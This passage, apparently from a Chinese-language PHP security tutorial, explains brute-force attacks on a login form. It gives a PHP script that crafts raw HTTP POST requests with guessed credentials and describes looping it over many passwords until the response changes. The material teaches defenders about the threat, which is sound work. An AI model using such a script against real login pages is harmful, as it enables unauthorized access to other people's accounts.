考虑下面的HTML表单:
CODE:
<form action="http://example.org/login.php" method="POST"> <p>Username: <input type="text" name="username" /></p> <p>Password: <input type="password" name="password" /></p> <p><input type="submit" /></p> </form>
攻击者会察看这个表单并建立一段脚本来POST合法的数据给http://example.org/login.php:
<?php $username = 'victim'; $password = 'guess'; $content = "username=$username&password=$password"; $content_length = strlen($content); $http_request = ''; $http_response = ''; $http_request .= "POST /login.php HTTP/1.1 "; $http_request .= "Host: example.org "; $http_request .= "Content-Type: application/x-www-form-urlencoded "; $http_request .= "Content-Length: $content_length "; $http_request .= "Connection: close "; $http_request .= " "; $http_request .= $content; if ($handle = fsockopen('example.org', 80)) { fputs($handle, $http_request); while (!feof($handle)) { $http_response .= fgets($handle, 1024); } fclose($handle); /* Check Response */ } else { /* Error */ } ?>
使这段脚本,攻击者还可以简单地加入一个循环来继续尝试不同的密码,并在每次尝试后检查$http_response变量。一旦$http_response变量有变化,就可以认为猜测到了正确的密码。